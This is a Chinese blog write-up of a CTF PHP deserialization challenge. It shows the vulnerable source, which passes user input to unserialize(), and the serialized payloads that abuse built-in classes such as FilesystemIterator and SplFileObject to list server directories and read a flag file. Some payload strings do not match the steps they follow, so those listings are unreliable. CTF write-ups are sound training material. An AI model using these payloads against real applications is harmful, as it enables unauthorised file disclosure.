ez_serialize复现

CTF刷题记录 专栏收录该内容
109 篇文章 0 订阅

解题过程

题目给了源码

 <?php
error_reporting(0);
highlight_file(__FILE__);

class A{
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
    var $a;
    public function __construct($a)
    {
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{

    function vaild($code){
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
            return false;
        }
        else
            return true;
    }
}
if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
else{
    $a=new A;

} 

分析一下:php反序列化,但是题目中并没有可利用的类,注意这个echo new $this->class ($this->para);,可以利用php原生类来进行操作

FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容,按行读取,跨行需要遍历
DirectoryIterator 遍历目录 直接echo会输出目录下的

有了这个思路就清晰了,先利用FilesystemIterator读取一下目录/var/www/html

<?php
class A{
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html';
	public $check;
}
$a =  new A();
echo serialize($a);

结果

O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

获得目录1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE
在这里插入图片描述
然后继续查看该目录文件

O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

回显
在这里插入图片描述
接下来使用SplFileObject读取文件内容

<?php
class A{
	public $class = 'SplFileObject';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
	public $check;
}
$a =  new A();
echo serialize($a);

回显,环境是自己复现的,flag瞎写的。

O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

DirectoryIterator这个东西可以查看/var/www/html中的文件夹,但是再往后就不行了。

O:1:"A":3:{s:5:"class";s:17:"DirectoryIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

参考链接

  1. DASCTF-三月赛-web题复现
  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值